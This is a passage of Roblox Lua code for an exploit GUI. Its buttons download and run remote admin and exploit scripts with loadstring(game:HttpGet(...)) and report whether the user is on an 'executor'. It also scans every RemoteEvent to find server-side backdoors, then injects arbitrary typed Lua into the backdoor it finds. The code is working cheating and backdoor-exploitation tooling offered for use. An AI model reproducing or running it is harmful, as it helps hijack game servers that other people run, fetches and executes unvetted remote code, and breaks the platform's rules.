				if v:IsA("SelectionBox") and v.Name == "CUtil_Part_Highlight" then
					v:Destroy()
				end
			end
			outlinedallparts = false
			contents.outlineallparts.Text = 'Outline All Parts'
		end
	end)
	
	contents.iy.MouseButton1Click:Connect(function()
		local a,b = pcall(function()
			loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
		end)
		if not a then
			local exec = getIfCusCilentEnv()
			if exec == 'Unknown' then
				log('You are not on a Modified Cilent!')
			else
				log('It seems like you are on an executor but it errors, Do you have an low sUnc/Unc?')
			end
		end
	end)
	
	contents.na.MouseButton1Click:Connect(function()
		local a,b = pcall(function()
			loadstring(game:HttpGet("https://raw.githubusercontent.com/ltseverydayyou/Nameless-Admin/main/Source.lua"))()
		end)
		if not a then
			local exec = getIfCusCilentEnv()
			if exec == 'Unknown' then
				log('You are not on a Modified Cilent!')
			else
				log('It seems like you are on an executor but it errors, Do you have an low sUnc/Unc?')
			end
		end
	end)
	
	contents.rox6.MouseButton1Click:Connect(function()
		local a,b = pcall(function()
			loadstring(game:HttpGet("https://github.com/LuaGunsX/LuasLegacyScripts/blob/main/%5BGUI%5D%20Ro-Xploit%206.0"))()
		end)
		if not a then
			local exec = getIfCusCilentEnv()
			if exec == 'Unknown' then
				log('You are not on a Modified Cilent!')
			else
				log('It seems like you are on an executor but it errors, Do you have an low sUnc/Unc?')
			end
		end
	end)
	
	contents.fbyp.MouseButton1Click:Connect(function()
		script.Parent.bckdooor.Visible = true
	end)
	
	contents.fbyp2.MouseButton1Click:Connect(function()
		script.Parent.FBYPEX.Visible = true
	end)
end
coroutine.wrap(LIBOLM_fake_script)()
local function ZSLH_fake_script() -- bckdooor.LocalScript 
	local script = Instance.new('LocalScript', bckdooor)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	local UserInputService = game:GetService("UserInputService")
	
	local gui = script.Parent
	
	local dragging
	local dragInput
	local dragStart
	local startPos
	
	local function update(input)
		local delta = input.Position - dragStart
		gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
	end
	
	gui.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = gui.Position
			
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	gui.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)
	
	UserInputService.InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			update(input)
		end
	end)
end
coroutine.wrap(ZSLH_fake_script)()
local function PVANHM_fake_script() -- ScrollingFrame_2.LocalScript 
	local script = Instance.new('LocalScript', ScrollingFrame_2)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.TextBox:GetPropertyChangedSignal("Text"):Connect(function()
		script.Parent.TextLabel.Text = require(script.mod).run(script.Parent.TextBox.Text)
	end)
end
coroutine.wrap(PVANHM_fake_script)()
local function YUVY_fake_script() -- cls.LocalScript 
	local script = Instance.new('LocalScript', cls)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.ScrollingFrame.TextBox.Text = ''
	end)
end
coroutine.wrap(YUVY_fake_script)()
local function HNXG_fake_script() -- inj.LocalScript 
	local script = Instance.new('LocalScript', inj)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	local function FindBackdoorFunction()
		local founded = nil
		for _, v in pairs(game:GetDescendants()) do
			if v:IsA("RemoteEvent") then
				v:FireServer("local foundedReturnAsync = Instance.new('IntValue', workspace); foundedReturnAsync.Name = 'BackdoorAsyncRecognition'")
				if workspace:WaitForChild('BackdoorAsyncRecognition') then
					founded = v
					break
				end
			end
		end
		return founded
	end
	
	script.Parent.MouseButton1Click:Connect(function()
		local get = FindBackdoorFunction()
		if get then
			script.Parent.Parent.backdoorLabel.Text = "BACKDOOR: " .. get:GetFullName()
		end
	end)
end
coroutine.wrap(HNXG_fake_script)()
local function FSOGP_fake_script() -- exe.LocalScript 
	local script = Instance.new('LocalScript', exe)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		local labelText = script.Parent.Parent.backdoorLabel.Text
		if labelText ~= 'BACKDOOR: nil' then
			local rawBackdoor = string.gsub(labelText, "^BACKDOOR:%s*", "")
			local backdoor = string.match(rawBackdoor, "^(.-)%s*$")
			loadstring("game." .. backdoor .. ":FireServer([[" .. script.Parent.Parent.ScrollingFrame.TextBox.Text .. "]])")()
		end
	end)
end
coroutine.wrap(FSOGP_fake_script)()
local function ZSJHQ_fake_script() -- TextButton_2.LocalScript 
	local script = Instance.new('LocalScript', TextButton_2)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
	end)
end
coroutine.wrap(ZSJHQ_fake_script)()
local function WEBENGR_fake_script() -- TextButton_4.LocalScript 
	local script = Instance.new('LocalScript', TextButton_4)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.
			Parent.
				Parent.
			Parent.
		Visible       =                           false
	end)
end
coroutine.wrap(WEBENGR_fake_script)()
